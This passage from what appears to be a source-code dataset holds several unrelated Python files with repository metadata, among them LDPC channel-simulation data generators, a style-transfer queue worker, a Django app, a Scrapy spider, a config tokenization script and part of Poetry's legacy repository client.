fout_label = open(format('%s_%.1f.dat' % (train_config.training_label_file, SNR)), 'wb')
elif generate_data_for == 'Test':
fout_feature = open(format('%s_%.1f.dat' % (train_config.test_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.test_label_file, SNR)), 'wb')
for ik in range(0, total_batches):
x_bits, u_coded_bits, s_mod, ch_noise, y_receive = Transmission.ACGN_transmission(SNR, batch_size, train_config, code, channel)
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_feature) # write features to file
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_label)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_RLN_Training_Data(code, channel, train_config, generate_data_for):
#initialized
SNR_set = train_config.SNR_set
if generate_data_for == 'Training':
total_batches = int(train_config.training_sample_num // train_config.training_minibatch_size)
batch_size = train_config.training_minibatch_size
elif generate_data_for == 'Test':
total_batches = int(train_config.test_sample_num // train_config.test_minibatch_size)
batch_size = train_config.test_minibatch_size
else:
print('Invalid objective of data generation!')
exit(0)
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
if generate_data_for == 'Training':
fout_feature = open(format('%s_%.1f.dat' % (train_config.training_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.training_label_file, SNR)), 'wb')
fout_factor = open(format('%s_%.1f.dat' % (train_config.training_factor_file, SNR)), 'wb')
elif generate_data_for == 'Test':
fout_feature = open(format('%s_%.1f.dat' % (train_config.test_feature_file, SNR)), 'wb')
fout_label = open(format('%s_%.1f.dat' % (train_config.test_label_file, SNR)), 'wb')
fout_factor = open(format('%s_%.1f.dat' % (train_config.test_factor_file, SNR)), 'wb')
for ik in range(0, total_batches):
x_bits, u_coded_bits, s_mod, ch_noise, y_receive, r_factor = Transmission.RLN_transmission(SNR, batch_size, train_config, code, channel)
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_feature) # write features to file
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_label)
r_factor = r_factor.astype(np.float32)
r_factor.tofile(fout_factor)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_AWGN_Decoding_Data(gen_config, code):
#initialized
SNR_set = gen_config.SNR_set
total_samples = gen_config.total_samples
batch_size = 5000
K = gen_config.K_code
N = gen_config.N_code
rng = np.random.RandomState(None)
total_batches = int(total_samples // (batch_size*K))
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (gen_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (gen_config.decoding_x_file, SNR))
fout_yrecieve = open(y_recieve_file, 'wb')
fout_xtransmit = open(x_transmit_file, 'wb')
for ik in range(0, total_batches):
x_bits = np.zeros((batch_size, K))
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
noise_awgn = rng.randn(batch_size, N)
ch_noise_normalize = noise_awgn.astype(np.float32)
ch_noise_sigma = np.sqrt(1 / np.power(10, SNR / 10.0) / 2.0)
ch_noise = ch_noise_normalize * ch_noise_sigma
y_receive = s_mod + ch_noise
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_yrecieve)
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_xtransmit)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_ACGN_Decoding_Data(gen_config, code):
#initialized
SNR_set = gen_config.SNR_set
total_samples = gen_config.total_samples
batch_size = 5000
K = gen_config.K_code
N = gen_config.N_code
rng = np.random.RandomState(None)
total_batches = int(total_samples // (batch_size*K))
## Data generating starts
start = datetime.datetime.now()
fin_cov_file = open(gen_config.cov_1_2_file , 'rb')
cov_1_2_mat = np.fromfile(fin_cov_file, np.float32, N*N)
cov_1_2_mat = np.reshape(cov_1_2_mat, [N, N])
fin_cov_file.close()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (gen_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (gen_config.decoding_x_file, SNR))
fout_yrecieve = open(y_recieve_file, 'wb')
fout_xtransmit = open(x_transmit_file, 'wb')
for ik in range(0, total_batches):
x_bits = np.zeros((batch_size, K))
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
noise_awgn = rng.randn(batch_size, N)
ch_noise_normalize = noise_awgn.astype(np.float32)
ch_noise_normalize = np.matmul(ch_noise_normalize, cov_1_2_mat)
ch_noise_sigma = np.sqrt(1 / np.power(10, SNR / 10.0) / 2.0)
ch_noise = ch_noise_normalize * ch_noise_sigma
y_receive = s_mod + ch_noise
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_yrecieve)
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_xtransmit)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
def Generate_RLN_Decoding_Data(gen_config, code):
#initialized
SNR_set = gen_config.SNR_set
total_samples = gen_config.total_samples
batch_size = 5000
K = gen_config.K_code
N = gen_config.N_code
rng = np.random.RandomState(None)
total_batches = int(total_samples // (batch_size*K))
## Data generating starts
start = datetime.datetime.now()
for SNR in SNR_set:
y_recieve_file = format('%s_%.1f.dat' % (gen_config.decoding_y_file, SNR))
x_transmit_file = format('%s_%.1f.dat' % (gen_config.decoding_x_file, SNR))
r_factor_file = format('%s_%.1f.dat' % (gen_config.decoding_r_file, SNR))
fout_yrecieve = open(y_recieve_file, 'wb')
fout_xtransmit = open(x_transmit_file, 'wb')
fout_rfactor = open(r_factor_file, 'wb')
for ik in range(0, total_batches):
x_bits = np.zeros([batch_size, K])
u_coded_bits = code.encode_LDPC(x_bits)
s_mod = Modulation.BPSK(u_coded_bits)
noise_awgn = rng.randn(batch_size, N)
ch_noise_normalize = noise_awgn.astype(np.float32)
ch_noise_sigma = np.sqrt(1 / np.power(10, SNR / 10.0) / 2.0)
rayleigh_factor = np.sqrt(np.square(np.sqrt(1/2)*np.random.randn(batch_size, N))+np.square(np.sqrt(1/2)*np.random.randn(batch_size, N)))
ch_noise = ch_noise_normalize * ch_noise_sigma
y_receive = np.multiply(rayleigh_factor, s_mod) + ch_noise
y_receive = y_receive.astype(np.float32)
y_receive.tofile(fout_yrecieve)
x_bits = x_bits.astype(np.float32)
x_bits.tofile(fout_xtransmit)
r_factor = rayleigh_factor.astype(np.float32)
r_factor.tofile(fout_rfactor)
end = datetime.datetime.now()
print('Time: %ds' % (end-start).seconds)
print("end\n")
|
[
"noreply@github.com"
] |
Leo-Chu.noreply@github.com
|
ee33100ebfe158e582551215af19e15f525d5eb3
|
04b2d06348bb7462fd9ec6f470a0ced6eeb0c639
|
/scoring_app/process_images_from_queue.py
|
a6139f614a87fafbff33fb2f14fa7d80c9af3a60
|
[
"LicenseRef-scancode-generic-cla"
] |
no_license
|
pjh177787/batch-scoring-deep-learning-models-with-aks-cn
|
0929377e7ad67a736be46bd175242e48dfb6e269
|
2d557a923d2a01432494a79279f28c4e4848d9c2
|
refs/heads/master
| 2020-06-21T06:13:06.898546
| 2019-07-18T10:13:39
| 2019-07-18T10:13:39
| 197,363,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,171
|
py
|
import ast
import style_transfer
import pathlib
import datetime
import time
import os
import logging
import util
import torch
from logging.handlers import RotatingFileHandler
def add_file_handler(logger, log_path):
"""
:param log_path: the log file to attach the handler to
"""
handler_format = util.get_handler_format()
file_handler = RotatingFileHandler(log_path, maxBytes=20000)
file_handler.setFormatter(handler_format)
logger.addHandler(file_handler)
def dequeue(bus_service, model_dir, queue, mount_dir, terminate=None):
"""
:param bus_service: service bus client
:param model_dir: the directory in storage where models are stored
:param queue: the name of the queue
:param terminate: (optional) used for debugging - terminate process instead of stay alive
"""
logger = logging.getLogger("root")
# start listening...
logger.debug("Start listening to queue '{}' on service bus...".format(queue))
while True:
# inspect queue
logger.debug("Peek queue...")
msg = bus_service.receive_queue_message(queue, peek_lock=True, timeout=30)
if msg.body is None:
if terminate:
logger.debug(
"Receiver has timed out, queue is empty. Exiting program..."
)
exit(0)
else:
logger.debug(
"Receiver has timed out, queue is empty. Waiting 1 minute before trying again..."
)
time.sleep(60)
continue
# get style, input_frame, input_dir & output_dir from msg body
msg_body = ast.literal_eval(msg.body.decode("utf-8"))
input_frame = msg_body["input_frame"]
video_name = msg_body["video_name"]
input_dir = os.path.join(mount_dir, video_name, util.Storage.INPUT_DIR.value)
output_dir = os.path.join(mount_dir, video_name, util.Storage.OUTPUT_DIR.value)
log_dir = os.path.join(mount_dir, video_name, "logs")
# make output dir if not exists
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# make log dir if not exists
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# create a new file handler for style transfer logs
log_file = "{}.log".format(input_frame.split(".")[0])
add_file_handler(logger, os.path.join(log_dir, log_file))
logger.debug("Queue message body: {}".format(msg_body))
# run style transfer
logger.debug("Starting style transfer on {}/{}".format(input_dir, input_frame))
style_transfer.stylize(
content_scale=None,
model_dir=os.path.join(mount_dir, model_dir),
cuda=1 if torch.cuda.is_available() else 0,
content_dir=input_dir,
content_filename=input_frame,
output_dir=output_dir,
)
logger.debug("Finished style transfer on {}/{}".format(input_dir, input_frame))
# delete msg
logger.debug("Deleting queue message...")
msg.delete()
# pop logger handler
logger.handlers.pop()
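# Hedged illustration (not part of the original module): dequeue() expects each queue
# message body to be a Python-literal dict containing at least the keys read above
# ('input_frame' and 'video_name'). The helper below returns an assumed example of that
# producer-side format; the function name and sample values are hypothetical.
def _example_message_body():
    return str({"video_name": "my_video", "input_frame": "000001.jpg"})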
|
[
"aperture@Scarborough.2a1h0bsfp3uezfmu44rlql2klg.shax.internal.chinacloudapp.cn"
] |
aperture@Scarborough.2a1h0bsfp3uezfmu44rlql2klg.shax.internal.chinacloudapp.cn
|
ee7b001a184f4b2cd7e008645fad0b0d6cfa2f51
|
e9b17518c315067442f839f226fdea55694bda7e
|
/RUR_II47.py
|
e680a4676e9cb0b5a46b126c47e262fa5e9e4786
|
[] |
no_license
|
bvrbanec/R.U.R.
|
2a21dc4c05244bd01d30539c131a0e0270806ec8
|
71952b597fb2aa305983408ac5873d7fc5318ffc
|
refs/heads/master
| 2021-05-30T19:12:27.574998
| 2016-01-19T10:00:40
| 2016-01-19T10:00:40
| 47,398,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,255
|
py
|
import socket
import time
try:
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(('192.168.1.110', 8072))
serversocket.listen(5) # become a server socket, maximum 5 connections
    radius, address1 = serversocket.accept() ## initial connection
print(radius,address1)
time.sleep(5)
    x=raw_input() #helena (human): poor radius
radius.send('ja te volim') #send me to tha stamping mill
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: but i dont want them to kill you
x=raw_input()
radius.send('ja te volim') #i won't work
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: do you hate us? why?
x=raw_input()
    radius.send('ja te volim') #You are not as strong as the robots
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: but someone must give orders
x=raw_input()
radius.send('ja te volim') #i don't want any master
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: Radius, dr.Gall gave you a better brain
x=raw_input()
radius.send('ja te volim') #i don't want any master
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: I'm sure they'd put you in charge
x=raw_input()
radius.send('ja te volim') #I'm sure they'd put you in charge
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: You are mad.
x=raw_input()
radius.send('ja te volim') #Then send me to the stamping-mill.
radius, address1 = serversocket.accept()
print(radius,address1)
#helena: Do you think we're afraid of you
x=raw_input()
radius.send('ja te volim') #What are you going to do?
radius, address1 = serversocket.accept()
print(radius,address1)
serversocket.close()
finally:
serversocket.close()
|
[
"k-ova@windowslive.com"
] |
k-ova@windowslive.com
|
d518e784b4d8bec047a3681717598e57ef0d1e66
|
6c523408c0122547d84ac7926cb67ee24f070efd
|
/06-crud-jango/project/urls.py
|
fcfd5c910cfb4a29a6c9f98c003559a2a729f1b9
|
[] |
no_license
|
everaldobass/curso-python3
|
153f4364713f76984ccb00670defa927bdbdc4eb
|
1874803ff957df246fa052f5588f6066f4f948d9
|
refs/heads/master
| 2023-05-02T13:25:50.169067
| 2021-05-18T20:01:52
| 2021-05-18T20:01:52
| 186,182,832
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,171
|
py
|
"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
# import home
from app.views import home, form, create, view, edit, update, delete
urlpatterns = [
path('admin/', admin.site.urls),
    # created the home url
path('', home, name='home'),
path('form/', form, name='form'),
path('create/', create, name='create'),
path('view/<int:pk>/', view, name='view'),
path('edit/<int:pk>/', edit, name='edit'),
path('update/<int:pk>/', update, name='update'),
path('delete/<int:pk>/', delete, name='delete')
]
|
[
"everaldobass@gmail.com"
] |
everaldobass@gmail.com
|
5317db7c60d9495980afc0deed2e52eba40c2cdc
|
c1d595150f3e983e75822af1f8ac1b31c4f35806
|
/generic_json_tokenization.py
|
f10ded8f740417522d97b1e03ef2e80a891873c8
|
[] |
no_license
|
soumabhasarkar/Tokenization
|
c48baf9bdac702c1956d595d10f1d0891fd48fe4
|
bd281d8e30b4525a5431d312ee8381d9aea2b300
|
refs/heads/master
| 2020-03-29T23:31:02.011834
| 2018-09-26T19:11:12
| 2018-09-26T19:11:12
| 150,476,362
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,667
|
py
|
#!/usr/bin/env python
"""Tokenization script to find and replace ."""
__author__ = "Soumabha Sarkar"
__version__ = "1.0.2"
__maintainer__ = "Soumabha Sarkar"
__email__ = "soumabhasarkar@gmail.com"
import sys
import argparse
import errno
import os, fnmatch
import csv
import ast
import json
import traceback
import subprocess
import itertools
db_details_dict_keys = ['oltpDbName','cfgDbName','hostOltp','hostCfg']
def getTokenForFile(filepath, inculde_filetype_dict, exculde_filetype_dict):
final_include_tokens = []
try:
# Get all include & exclude file or file type
inculde_filetype_list = inculde_filetype_dict.keys()
exculde_filetype_list = exculde_filetype_dict.keys()
# Filter include & exclude file or file type based on the file name
filename_inculde_filetype_keys = [filetype for filetype in inculde_filetype_list if fnmatch.fnmatch( filepath, '*'+filetype)]
filename_exculde_filetype_keys = [filetype for filetype in exculde_filetype_list if fnmatch.fnmatch( filepath, '*'+filetype)]
include_tokens = []
exculde_tokens = []
# Get tokens for filtered include & exclude file or file type
for item in filename_inculde_filetype_keys:
include_tokens = include_tokens + inculde_filetype_dict[item]
for item in filename_exculde_filetype_keys:
            exculde_tokens = exculde_tokens + exculde_filetype_dict[item]
# Remove tokens for exclude files
final_include_tokens = [token for token in include_tokens if token not in exculde_tokens]
# Remove duplicate tokens
final_include_tokens.sort()
final_include_tokens = list(final_include_tokens for final_include_tokens,_ in itertools.groupby(final_include_tokens))
except Exception as ex:
        print('Error occurred while getting token information for {0}'.format(filepath))
print(traceback.print_exc(file=sys.stdout))
sys.exit(1)
return final_include_tokens
def findReplace(directory, inculde_filetype_dict, exculde_filetype_dict):
outputlst = []
for path, dirs, files in os.walk(os.path.abspath(directory)):
for filename in files:
filepath = os.path.join(path, filename)
new_file = True
final_include_tokens = getTokenForFile(filepath, inculde_filetype_dict, exculde_filetype_dict)
if final_include_tokens:
for token in final_include_tokens:
out_str = ''
try:
findstr = token[0]
replacestr = token[1]
find_found = False
printstr = ''
with open(filepath, "r", encoding='ISO-8859-1') as f:
s = f.readlines()
for item in s:
if item.find(findstr) > -1:
find_found = True
out_str += item.replace(findstr, replacestr)
if find_found:
with open(
filepath,
"w",
encoding='ISO-8859-1',
errors='ignore') as f:
outputlst.append(filepath)
if new_file:
print('Modifying {0}'.format(filepath))
new_file = False
print('Original String ====%s==== Replace with ====%s====' %(findstr, replacestr))
f.write(out_str)
except Exception as ex:
print('Error: Cannot replace {0} with {1} in {2} file'.format(findstr, replacestr, filepath))
print(traceback.print_exc(file=sys.stdout))
pass
return outputlst
def getDbHostDbService(reader, host_env):
db_detail = dict.fromkeys(db_details_dict_keys)
try:
# Get DB details in JSON file
db_dict = reader['db_dict']
host_db = reader['host_db']
# check if there is any DB Host suffix defined for Hosting Environment
if host_env in host_db.keys():
host_oltp = host_db[host_env][0]
host_cfg = host_db[host_env][1]
else:
host_oltp = host_db['seed'][0]
host_cfg = host_db['seed'][1]
# Get DB Service name according to Environment
oltp_db_name = db_dict[host_env] + reader['db_type']['type'][0]
cfg_db_name = db_dict[host_env] + reader['db_type']['type'][1]
db_detail['oltpDbName'] = oltp_db_name
db_detail['cfgDbName'] = cfg_db_name
db_detail['hostOltp'] = host_oltp
db_detail['hostCfg'] = host_cfg
except IndexError:
        print('Error: Array index out of range ')
print(traceback.print_exc(file=sys.stdout))
print('DB Host suffix not found. Terminating process ')
sys.exit(1)
except ValueError:
print("Error: Decoding JSON failed")
print(traceback.print_exc(file=sys.stdout))
print('DB Service name not found. Terminating process ')
sys.exit(1)
except Exception as ex:
print("Error: Unhandled exception occured ")
print(traceback.print_exc(file=sys.stdout))
print('Terminating process ')
sys.exit(1)
return db_detail
def getFileList(token, node):
try:
filetype_list = token[node]
except:
filetype_list = []
return filetype_list
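# Hedged sketch (not part of the original script): a minimal shape of the JSON config
# that tokenize() below expects, inferred from the keys accessed in this file. All
# concrete values are made-up placeholders.
_EXAMPLE_CONFIG_SKETCH = {
    "db_dict": {"dev1": "MYAPPDEV1"},
    "host_db": {"seed": ["-oltp-host", "-cfg-host"], "dev1": ["-oltp-dev", "-cfg-dev"]},
    "db_type": {"type": ["_OLTP", "_CFG"]},
    "tokenize": {
        "tokens": [
            {
                "pattern": True,
                "find": "@@DB_URL@@",
                "replace": "jdbc://$HOST_OLTP$/$OLTP_DB_NAME$",
                "includeFiles": [".properties"],
                "excludeFiles": []
            },
            {
                "pattern": False,
                "find": "@@LOG_LEVEL@@",
                "dev": "DEBUG",
                "qa": "INFO",
                "prod": "WARN",
                "includeFiles": [".xml"],
                "excludeFiles": []
            }
        ]
    }
}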
def tokenize(jsonfilepath, host_env, host_reg, host_tier):
fileExist = os.path.exists(jsonfilepath)
if not fileExist:
print("The JSON file \"{0}\" does not exists. Process terminated".format(jsonfilepath))
sys.exit(errno.ENOENT)
with open(jsonfilepath, 'r') as jsonfile:
try:
reader = json.load(jsonfile)
except ValueError:
print('{} is not a valid json file'.format(jsonfilepath))
print(traceback.print_exc(file=sys.stdout))
sys.exit(errno.EBFONT)
DbHostDbService = getDbHostDbService(reader,host_env)
include_files_dict = {}
exculde_files_dict = {}
for token in reader['tokenize']['tokens']:
try:
replacestr=''
pattern = token['pattern'] # Check if Replace Token follows a pattern
if pattern:
findstr = token['find']
replacestr = token['replace'].replace('$HOST_REGION$', host_reg).replace(
'$HOST_ENV$', host_env).replace(
'$OLTP_DB_NAME$', DbHostDbService['oltpDbName'].lower()).replace( # Replace OLTP DB Service Name
'$CFG_DB_NAME$',DbHostDbService['cfgDbName'].lower()).replace( # Replace CFG DB Service Name
'$HOST_OLTP$',DbHostDbService['hostOltp'].lower()).replace( # Replace OLTP DB Host suffix
'$HOST_CFG$', DbHostDbService['hostCfg'].lower()).replace( # Replace CFG DB Host suffix
'$HOST_TIER$',host_tier.upper())
else:
findstr = token['find']
replacestr = token[host_tier] #Replace string follows no pattern. Replace string value varies according to Deployment Environment
include_file_list = getFileList(token, 'includeFiles')
exculde_file_list = getFileList(token, 'excludeFiles')
for include_file in include_file_list :
include_files_dict.setdefault(include_file,[]).append([findstr,replacestr]) # Filter Tokens by Include File type
for exculde_file in exculde_file_list:
exculde_files_dict.setdefault(exculde_file,[]).append([findstr,replacestr]) # Filter Tokens by Exclude File type
except:
print('Error:')
print(traceback.print_exc(file=sys.stdout))
sys.exit(1)
output = findReplace('.', include_files_dict, exculde_files_dict)
if output:
print('Total {0} files modified'.format(len(output)))
print(
"==================================================================\n"
)
def xstr(s):
return '' if s is None else str(s)
class TokenizationArgumentParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('Error: %s\n' % message)
self.print_help()
sys.exit(errno.EINVAL)
def main():
parser = TokenizationArgumentParser(
description='This Script will replace DB URLs and other service URLs mentioned in JSON file depending on Deployment Env and Region')
parser.add_argument(
'-c', '--config', action='store', dest='jsonFilePath', required= True, help='JSON File path')
parser.add_argument(
'-r', '--region', action='store', dest='region', required= True, help='host region e.g. ie1, de1')
parser.add_argument(
'-e', '--environment', action='store', dest='environment', required= True, help='host env e.g. dev1, dev2, qa1')
parser.add_argument(
'-t','--tier', action='store', dest='tier', required= True, help='deploy tier e.g. dev, qa, prod')
results = parser.parse_args()
print ('Hosting Environment name: {0} \nHosting Tier: {1} \nRegion: {2} \nJSON file path: {3}'.format(
results.environment, results.tier, results.region, results.jsonFilePath))
host_reg = xstr(results.region).lower()
host_env = xstr(results.environment).lower()
host_tier = xstr(results.tier).lower()
json_filepath = results.jsonFilePath
print('===================Tokenization Starts======================')
tokenize(json_filepath, host_env, host_reg, host_tier)
print('===================Tokenization Ends======================')
if __name__ == "__main__":
main()
|
[
"soumabhasarkar@gmail.com"
] |
soumabhasarkar@gmail.com
|
9af86858361e28982c68c5f85ab4f527d3464dc4
|
dfc8a69e9a03ca4b48f2107acfe38553e3247544
|
/python/05scrapy/dongguan/dongguan/spiders/dongguansun.py
|
15775ad052b243e020724459b41a4de9075cf371
|
[] |
no_license
|
Leap-Zhao/skills_program
|
ec943c6d68fcb8a01aee1b8ed970a82c86f44e63
|
11faf8b51aa1b7b9bee7e68a7fac98c030e6aac2
|
refs/heads/master
| 2018-11-15T10:21:57.663875
| 2018-09-20T10:20:23
| 2018-09-20T10:20:23
| 83,137,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from dongguan.items import DongguanItem
class DongguansunSpider(CrawlSpider):
name = 'dongguansun'
allowed_domains = ['wz.sun0769.com']
start_urls = ['http://wz.sun0769.com/index.php/question/questionType?type=4&page=0']
    # link extractor for the other listing-page links on each page
pageLinks = LinkExtractor(allow=r'type=4&page=\d+')
    # link extractor for the post links on each page
postLinks = LinkExtractor(allow=r'/html/question/\d+/\d+.shtml')
rules = (
Rule(pageLinks, follow=True),
Rule(postLinks, callback='parse_item',follow=False),
)
def parse_item(self, response):
# print response.url
item = DongguanItem()
item['title'] = response.xpath("//div[@class='pagecenter p3']//strong/text()").extract()[0]
item['titleId'] = item['title'].strip().split(" ")[-1].split(":")[-1]
        # if the post has images, a div with class 'contentext' is present
contentext = response.xpath("//div[@class='contentext']/text()").extract()
if len(contentext) == 0:
            # no images
contentext = response.xpath("//div[@class='c1 text14_2']/text()").extract()
item['content'] = ''.join(contentext).strip()
else:
            # images present
item['content'] = ''.join(contentext).strip()
item['url'] = response.url
yield item
#i['domain_id'] = response.xpath('//input[@id="sid"]/@value').extract()
#i['name'] = response.xpath('//div[@id="name"]').extract()
#i['description'] = response.xpath('//div[@id="description"]').extract()
# return i
|
[
"zhaofeiyue1234@163.com"
] |
zhaofeiyue1234@163.com
|
02536f12ed72c61c39d338b3dffda9b337c60f10
|
3ffb03144c4d2ac03bae54ae492969f02dc6e52d
|
/contact/forms.py
|
4c73a1665feb7592f3b5c3084b004e7794c56927
|
[] |
no_license
|
onadj/brunoshop
|
4e1e705b5d7d9ea157b7ddbbcafecf7d9dcc4bda
|
926b5afb7f2787d9fef626e7903d5cb219e81180
|
refs/heads/master
| 2023-02-16T18:02:33.103335
| 2021-01-12T19:24:29
| 2021-01-12T19:24:29
| 324,526,008
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from django import forms
class ContactForm(forms.Form):
subject = forms.CharField()
# phone = forms.CharField()
from_email = forms.EmailField(required=True)
message = forms.CharField(widget=forms.Textarea, required=True)
|
[
"oliver.nad@gmail.com"
] |
oliver.nad@gmail.com
|
825659d2cff6fe1c1c3a8ae5f12736385911d780
|
2df8c5c10dbde5463af74d6c159536e9389c4623
|
/.vscode/extensions/batisteo.vscode-django-1.3.0/.venv/lib/python3.9/site-packages/poetry/repositories/legacy_repository.py
|
7442d65a561f19039709e32826ce469441f47ce0
|
[
"MIT"
] |
permissive
|
cclint/dotfiles
|
be35589d0c8293c94a628eb935da5b7e29de473c
|
8dbd1b768add3fdb68e749f965ef3025ee9de4ed
|
refs/heads/master
| 2023-03-19T08:44:51.600748
| 2021-03-11T04:52:49
| 2021-03-11T04:52:49
| 282,515,062
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,458
|
py
|
import cgi
import re
import warnings
from collections import defaultdict
from typing import Generator
from typing import Optional
from typing import Union
import requests
import requests.auth
from cachecontrol import CacheControl
from cachecontrol.caches.file_cache import FileCache
from cachy import CacheManager
from poetry.core.packages import Package
from poetry.core.packages.utils.link import Link
from poetry.core.semver import Version
from poetry.core.semver import VersionConstraint
from poetry.core.semver import VersionRange
from poetry.core.semver import parse_constraint
from poetry.locations import REPOSITORY_CACHE_DIR
from poetry.utils._compat import Path
from poetry.utils.helpers import canonicalize_name
from poetry.utils.patterns import wheel_file_re
from ..config.config import Config
from ..inspection.info import PackageInfo
from ..installation.authenticator import Authenticator
from .exceptions import PackageNotFound
from .exceptions import RepositoryError
from .pypi_repository import PyPiRepository
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
try:
from html import unescape
except ImportError:
try:
from html.parser import HTMLParser
except ImportError:
from HTMLParser import HTMLParser
unescape = HTMLParser().unescape
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
with warnings.catch_warnings():
warnings.simplefilter("ignore")
import html5lib
class Page:
VERSION_REGEX = re.compile(r"(?i)([a-z0-9_\-.]+?)-(?=\d)([a-z0-9_.!+-]+)")
SUPPORTED_FORMATS = [
".tar.gz",
".whl",
".zip",
".tar.bz2",
".tar.xz",
".tar.Z",
".tar",
]
def __init__(self, url, content, headers):
if not url.endswith("/"):
url += "/"
self._url = url
encoding = None
if headers and "Content-Type" in headers:
content_type, params = cgi.parse_header(headers["Content-Type"])
if "charset" in params:
encoding = params["charset"]
self._content = content
if encoding is None:
self._parsed = html5lib.parse(content, namespaceHTMLElements=False)
else:
self._parsed = html5lib.parse(
content, transport_encoding=encoding, namespaceHTMLElements=False
)
@property
def versions(self): # type: () -> Generator[Version]
seen = set()
for link in self.links:
version = self.link_version(link)
if not version:
continue
if version in seen:
continue
seen.add(version)
yield version
@property
def links(self): # type: () -> Generator[Link]
for anchor in self._parsed.findall(".//a"):
if anchor.get("href"):
href = anchor.get("href")
url = self.clean_link(urlparse.urljoin(self._url, href))
pyrequire = anchor.get("data-requires-python")
pyrequire = unescape(pyrequire) if pyrequire else None
link = Link(url, self, requires_python=pyrequire)
if link.ext not in self.SUPPORTED_FORMATS:
continue
yield link
def links_for_version(self, version): # type: (Version) -> Generator[Link]
for link in self.links:
if self.link_version(link) == version:
yield link
def link_version(self, link): # type: (Link) -> Union[Version, None]
m = wheel_file_re.match(link.filename)
if m:
version = m.group("ver")
else:
info, ext = link.splitext()
match = self.VERSION_REGEX.match(info)
if not match:
return
version = match.group(2)
try:
version = Version.parse(version)
except ValueError:
return
return version
_clean_re = re.compile(r"[^a-z0-9$&+,/:;=?@.#%_\\|-]", re.I)
def clean_link(self, url):
"""Makes sure a link is fully encoded. That is, if a ' ' shows up in
the link, it will be rewritten to %20 (while not over-quoting
% or other characters)."""
return self._clean_re.sub(lambda match: "%%%2x" % ord(match.group(0)), url)
class LegacyRepository(PyPiRepository):
def __init__(
self, name, url, config=None, disable_cache=False, cert=None, client_cert=None
): # type: (str, str, Optional[Config], bool, Optional[Path], Optional[Path]) -> None
if name == "pypi":
raise ValueError("The name [pypi] is reserved for repositories")
self._packages = []
self._name = name
self._url = url.rstrip("/")
self._client_cert = client_cert
self._cert = cert
self._cache_dir = REPOSITORY_CACHE_DIR / name
self._cache = CacheManager(
{
"default": "releases",
"serializer": "json",
"stores": {
"releases": {"driver": "file", "path": str(self._cache_dir)},
"packages": {"driver": "dict"},
"matches": {"driver": "dict"},
},
}
)
self._authenticator = Authenticator(
config=config or Config(use_environment=True)
)
self._basic_auth = None
username, password = self._authenticator.get_credentials_for_url(self._url)
if username is not None and password is not None:
self._basic_auth = requests.auth.HTTPBasicAuth(username, password)
self._disable_cache = disable_cache
@property
def cert(self): # type: () -> Optional[Path]
return self._cert
@property
def client_cert(self): # type: () -> Optional[Path]
return self._client_cert
@property
def session(self):
session = self._authenticator.session
if self._basic_auth:
session.auth = self._basic_auth
if self._cert:
session.verify = str(self._cert)
if self._client_cert:
session.cert = str(self._client_cert)
return CacheControl(session, cache=FileCache(str(self._cache_dir / "_http")))
@property
def authenticated_url(self): # type: () -> str
if not self._basic_auth:
return self.url
parsed = urlparse.urlparse(self.url)
return "{scheme}://{username}:{password}@{netloc}{path}".format(
scheme=parsed.scheme,
username=quote(self._basic_auth.username, safe=""),
password=quote(self._basic_auth.password, safe=""),
netloc=parsed.netloc,
path=parsed.path,
)
